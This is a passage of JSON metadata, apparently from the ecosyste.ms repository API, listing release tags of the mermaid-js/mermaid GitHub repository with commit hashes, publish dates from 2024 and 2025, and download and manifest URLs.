:"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.g